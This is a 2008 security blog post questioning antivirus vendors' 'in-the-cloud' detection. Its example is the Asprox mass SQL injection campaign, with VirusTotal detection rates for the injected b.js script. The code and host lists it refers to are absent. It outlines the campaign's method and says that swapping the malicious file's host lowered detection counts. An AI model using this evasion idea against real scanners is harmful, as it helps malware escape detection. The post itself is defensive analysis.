It looks like the new AV buzzword of “in-the-cloud-service” has gathered momentum among Anti- Virus vendors.
On June 30, 2008 an interview with Trend Micro’s CEO was published on Zdent.co.uk titled “Antivirus industry lied for 20 years “– it makes me wonder what is going to be changed in the 21st year? In the interview Trend Micro’s CEO unveiled the new vision of her company - moving to “In the Could Service” e.g. “throws all the unknown samples up into the cloud for deeper and faster pattern recognition”. What will happen if I’m offline...?.

Although I was very impressed -with this new vision, it did sound a little vague to me so I tried to clarify for myself what the meaning of “unknown samples”  is. As far as I know Anti-virus blocks what it has seen before and holds a signature for. What is the advantage of the cloud to detect malicious code that is unknown? I can understand that a cloud can indicate on volume but not sure about unknown malicious code.

I would like to share with you the results of my short research of “unknown samples” and “in-the–cloud service”.
During June 2008, a new round of mass SQL injection attacks started. The attack tool (which was aliased   as “Asprox”) has been around for a couple of years but during the last year there has been a new rise in the number of attacks. An “in the wild” new round of this mass attack is not supposed to be considered “unknown” to security vendors but let’s try to keep our optimistic spirit and not diverge.
The attack is designed to search Google for .asp pages which contain various terms, and will then launch SQL injection attacks against the websites returned by the search. A script/Iframe will be injected into the compromised website:

The injected script consisted of the following code:

I sent the [b.js] script for a Virus Total scan and got 10/33 AV products detecting the file as a potential Malware. Which is obviously a typical False Positive case? Isn’t it?

When modifying the script to point to another location of the malicious file [newhost.com.newfil.cgi], Virus Total reports on 6/33 AV products which detected the file as a potential Malware - where did the other 4 disappear to?

During June 2008, we detected more than 70 different domains hosting [b.js] and the location of the malicious file was unique to each and every one of them.
Following are the top malicious hosts with successful exploitation during the period of May 31 – June 30:

Can it be that Anti-virus products are now holding more signatures for domains and URLs rather than trying to identify a malicious code they never inspected before? As my research found, just by changing the domain names, some AVs did not find this code as malicious...... surprisingly enough.

As the [b.js] file is pointing to a malicious file which was the one I would expect security vendors to mark as dangerous, I posted the actual malicious file to Virus Total scan. This time half of the vendors detected it as a potential Malware so it came out ok we kept our optimistic spirit after all...

This malicious file is being around for over a month now. Isn’t that  enough time for security vendors to be familiar with a mass attack and signature this file? Will “in-the-cloud” service help to improve that? I’m not really sure. It needs a different security technology to come to the rescue.

Posted by Ayelet Heyman